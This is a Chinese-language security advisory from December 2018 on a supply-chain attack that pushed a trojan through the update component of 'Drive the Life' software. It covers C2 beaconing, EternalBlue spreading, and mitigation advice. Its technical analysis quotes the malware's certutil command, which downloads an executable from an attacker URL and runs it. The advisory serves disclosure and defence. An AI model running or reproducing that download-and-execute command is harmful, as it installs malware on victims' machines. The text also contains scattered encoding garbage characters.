安全預警通告
2018 年 12 月 17日
目錄
第 1 章 安全通告 1
第 2 章 文檔信息 2
第 3 章 事件信息 3
3.1 事件描述 3
3.2 風險等級 3
第 4 章 影響范圍 4
第 5 章 處置建議 5
第 6 章 技術分析 6
第 7 章 參考資料 9
第1章 安全通告
2018 年 12 月 14 日下午����,攻擊者通過“驅動人生”系列軟件“人生日歷”等升級程序下發木馬����。此木馬具備遠程執行代碼功能���,還攜帶有永恒之藍漏洞攻擊組件�����,可通過永恒之藍漏洞攻擊局域網的其它機器并接收遠程指令執行下一步操作�。
第2章 文檔信息
|
文檔名稱
|
“驅動人生”系列軟件供應鏈攻擊安全預警通告
|
|
關鍵字
|
驅動人生��、永恒之藍
|
|
發布日期
|
2018 年 12 月 15 日
|
第3章 事件信息
3.1 事件描述
2018 年 12 月 14 日,攻擊者通過“驅動人生”
系列軟件“人生日歷”等升級程序下發木馬����。此木馬具備遠程執行代碼功能��,
啟動后會將用戶計算機的詳細信息發往木馬服務器���,并接收遠程指令執行下一
步操作�����。同時其還攜帶有永恒之藍漏洞攻擊組件���,可通過永恒之藍漏洞攻擊局
域網與互聯網中其它機器�。
在 12 月 14 日下午前后����,病毒開始爆發��,僅數個小時就感染上萬臺電腦�����,在晚間時段�,我們發現木馬服務器被關閉�、人生日歷的升級下發通道關閉����。不排除后續存在大規模傳播的可能性�����。
3.2 風險等級
風險評級為:高危
預警等級:藍色預警(一般事件)
第4章 影響范圍
安裝“驅動人生”系列程序的計算機都有可能受此影響
未安裝永恒之藍系列漏洞(MS17-010)補丁的計算機
第5章 處置建議
1. 使用殺毒軟件查殺電腦
2. 做好相關重要數據備份工作
3. 加強系統安全工作�,及時升級軟件與安裝操作系統補丁
4. 服務器暫時關閉不必要的端口(如 135�、139���、445)
5. 服務器使用高強度密碼���,切勿使用弱口令���,防止黑客暴力破解
第6章 技術分析
2018 年 12 月 14 日 14 時����,驅動人生旗下的“人生日歷”產品����,通過其升級組件 DTLUpg.exe�����,開始下發執行木馬程序 f79cb9d2893b254cc75dfb7f3e454a6 9.exe�����,18 時開始木馬推送量開始擴大���,到 23 時我們向廠商通報了發現的情
況��,下發停止�。
截止 12 月 14 日 21 時��,該木馬累計攻擊計算機超過 5.7 萬臺(不包括漏洞
攻擊情況)���。
該木馬程序執行后����,會向系統安裝木馬服務 Ddriver 實現長期駐留���,之后向
服務器 haqo.net 發送宿主機器的詳細信息��,包括如下信息:
l 計算機名稱
l 操作系統版本
l 機器軟硬件信息等
之后接收服務器返回的 shellcode 指令執行�。
同時該木馬具有自升級���,遠程下載文件執行��,遠程創建服務等功能�����。
木馬在啟動后���,會根據服務器指令�����,下載一款永恒之藍漏洞利用工具�����,通過該漏洞利用工具��,攻擊局域網與互聯網中其它計算機����,攻擊成功后����,使用 cer tutil 做跳板程序���,向其它機器安裝該木馬(也可以安裝其它木馬����,由云端服務
器決定)�。
certutil -urlcache -split -f hxxp://dl.haqo.net/dl.exe c:\install.exe&c:\install.e
xe&……
第7章 參考資料
[1] https://cert.#/warning/detail?id=57cc079bc4686dd09981bf034130f1c9
